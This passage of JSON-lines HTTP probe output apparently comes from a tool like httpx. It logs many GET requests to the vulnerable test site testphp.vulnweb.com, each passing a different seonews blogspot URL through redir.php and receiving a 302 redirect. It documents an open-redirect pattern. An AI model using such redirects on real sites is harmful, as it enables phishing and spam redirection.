.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1632.blogspot.com/management.html\",\"time\":\"355.977768ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:15.265647944Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1633.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1633.blogspot.com/\",\"location\":\"http://seonews1633.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1633.blogspot.com/\",\"time\":\"355.758533ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:15.603341929Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1635.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1635.blogspot.com/\",\"location\":\"http://seonews1635.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1635.blogspot.com/\",\"time\":\"352.132148ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:16.447697183Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1635.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1635.blogspot.com/management.html\",\"location\":\"http://seonews1635.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1635.blogspot.com/management.html\",\"time\":\"354.694555ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:16.472842132Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1636.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1636.blogspot.com/\",\"location\":\"http://seonews1636.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1636.blogspot.com/\",\"time\":\"343.902564ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:16.506258785Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1636.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1636.blogspot.com/management.html\",\"location\":\"http://seonews1636.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1636.blogspot.com/management.html\",\"time\":\"346.764308ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:16.518708478Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1637.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1637.blogspot.com/management.html\",\"location\":\"http://seonews1637.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1637.blogspot.com/management.html\",\"time\":\"347.358909ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:16.870028001Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1638.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1638.blogspot.com/management.html\",\"location\":\"http://seonews1638.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1638.blogspot.com/management.html\",\"time\":\"352.82347ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:16.870596073Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1640.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1640.blogspot.com/management.html\",\"location\":\"http://seonews1640.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1640.blogspot.com/management.html\",\"time\":\"347.193427ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:16.946913243Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1642.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1642.blogspot.com/\",\"location\":\"http://seonews1642.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1642.blogspot.com/\",\"time\":\"358.492988ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:16.983235639Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1643.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1643.blogspot.com/management.html\",\"location\":\"http://seonews1643.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1643.blogspot.com/management.html\",\"time\":\"342.996305ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:17.010004538Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1644.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1644.blogspot.com/management.html\",\"location\":\"http://seonews1644.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1644.blogspot.com/management.html\",\"time\":\"362.793966ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:17.111420607Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1646.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1646.blogspot.com/\",\"location\":\"http://seonews1646.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1646.blogspot.com/\",\"time\":\"343.249709ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:17.15366201Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1647.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1647.blogspot.com/\",\"location\":\"http://seonews1647.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1647.blogspot.com/\",\"time\":\"351.753494ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:17.188929206Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1649.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1649.blogspot.com/\",\"location\":\"http://seonews1649.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1649.blogspot.com/\",\"time\":\"342.721461ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:17.260974724Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1649.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1649.blogspot.com/management.html\",\"location\":\"http://seonews1649.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1649.blogspot.com/management.html\",\"time\":\"342.33755ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:17.359814992Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1650.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1650.blogspot.com/\",\"location\":\"http://seonews1650.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1650.blogspot.com/\",\"time\":\"357.144107ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:17.426736834Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1650.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1650.blogspot.com/management.html\",\"location\":\"http://seonews1650.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1650.blogspot.com/management.html\",\"time\":\"342.885474ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:17.524907525Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1651.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1651.blogspot.com/management.html\",\"location\":\"http://seonews1651.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1651.blogspot.com/management.html\",\"time\":\"356.013455ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:20.673358358Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1654.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1654.blogspot.com/management.html\",\"location\":\"http://seonews1654.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1654.blogspot.com/management.html\",\"time\":\"347.721955ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:20.910591781Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1655.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1655.blogspot.com/management.html\",\"location\":\"http://seonews1655.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1655.blogspot.com/management.html\",\"time\":\"343.750133ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:20.931565454Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1658.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1658.blogspot.com/\",\"location\":\"http://seonews1658.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1658.blogspot.com/\",\"time\":\"356.595788ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:20.983834915Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1660.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1660.blogspot.com/management.html\",\"location\":\"http://seonews1660.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1660.blogspot.com/management.html\",\"time\":\"344.315286ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:21.398712701Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1661.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1661.blogspot.com/management.html\",\"location\":\"http://seonews1661.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1661.blogspot.com/management.html\",\"time\":\"352.180252ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:21.794400189Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1664.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1664.blogspot.com/\",\"location\":\"http://seonews1664.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1664.blogspot.com/\",\"time\":\"356.190824ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:21.829888709Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1664.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1664.blogspot.com/management.html\",\"location\":\"http://seonews1664.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1664.blogspot.com/management.html\",\"time\":\"343.550721ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:22.041797851Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1665.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1665.blogspot.com/\",\"location\":\"http://seonews1665.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1665.blogspot.com/\",\"time\":\"356.072554ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:22.546996007Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1666.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1666.blogspot.com/management.html\",\"location\":\"http://seonews1666.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1666.blogspot.com/management.html\",\"time\":\"338.508787ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:22.591399823Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1667.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1667.blogspot.com/\",\"location\":\"http://seonews1667.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1667.blogspot.com/\",\"time\":\"352.431369ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:24.310815033Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1667.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1667.blogspot.com/management.html\",\"location\":\"http://seonews1667.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1667.blogspot.com/management.html\",\"time\":\"343.149045ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:25.573741177Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1669.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1669.blogspot.com/management.html\",\"location\":\"http://seonews1669.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1669.blogspot.com/management.html\",\"time\":\"351.062114ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:25.614919083Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1670.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1670.blogspot.com/\",\"location\":\"http://seonews1670.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1670.blogspot.com/\",\"time\":\"346.004235ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:25.957114801Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1671.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1671.blogspot.com/management.html\",\"location\":\"http://seonews1671.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1671.blogspot.com/management.html\",\"time\":\"352.222596ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:26.796416248Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1672.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1672.blogspot.com/\",\"location\":\"http://seonews1672.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1672.blogspot.com/\",\"time\":\"346.20735ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:26.829117074Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1674.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1674.blogspot.com/management.html\",\"location\":\"http://seonews1674.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1674.blogspot.com/management.html\",\"time\":\"354.293779ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:26.855844175Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1676.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1676.blogspot.com/\",\"location\":\"http://seonews1676.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1676.blogspot.com/\",\"time\":\"347.999864ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:26.865425731Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1677.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1677.blogspot.com/\",\"location\":\"http://seonews1677.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1677.blogspot.com/\",\"time\":\"344.402079ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_co